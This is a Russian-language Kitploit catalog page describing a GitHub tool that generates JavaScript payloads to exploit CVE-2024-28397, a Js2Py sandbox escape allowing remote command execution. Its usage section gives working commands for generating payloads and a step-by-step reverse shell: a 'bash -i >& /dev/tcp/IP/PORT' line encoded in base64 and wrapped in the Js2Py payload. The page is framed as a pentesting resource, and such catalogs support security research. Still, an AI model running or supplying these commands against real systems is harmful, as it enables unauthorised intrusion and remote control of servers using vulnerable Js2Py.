Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-28397-Js2Py-RCE — Генерирует JavaScript-полезные нагрузки для эксплуатации CVE-2024-28397 (побег из песочницы Js2Py), обеспечивая удаленное выполнение команд и получение обратных оболочек через раскрытие внутренних компонентов Python. | Kitploit
Инструменты/GitHubGitHub/y0naldez/cve-2024-28397-js2py-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеГенерация Шеллкода
GitHuby0naldez/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Генерирует JavaScript-полезные нагрузки для эксплуатации CVE-2024-28397 (побег из песочницы Js2Py), обеспечивая удаленное выполнение команд и получение обратных оболочек через раскрытие внутренних компонентов Python.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3 месяцев назадЕщё не проверено

CVE-2024-28397 - Генератор полезной нагрузки для обхода песочницы Js2Py

Этот скрипт генерирует JavaScript-нагрузку, которая может быть выполнена с помощью Js2Py в уязвимых средах, где внутренние компоненты Python доступны через обёртки объектов.

Использование

Базовая команда выполнения:

root@kitploit:~
python3 cve-2024-28397.py -c "id"

Генерация компактной однострочной нагрузки:

root@kitploit:~
python3 cve-2024-28397.py -c "whoami" --compact

Обратный шелл с использованием Base64

Сгенерируйте Base64-нагрузку:

root@kitploit:~
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0

Сгенерируйте полезную нагрузку для Js2Py:

root@kitploit:~
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact

Замените BASE64_OUTPUT на строку Base64, полученную на первом шаге.

Скачать инструмент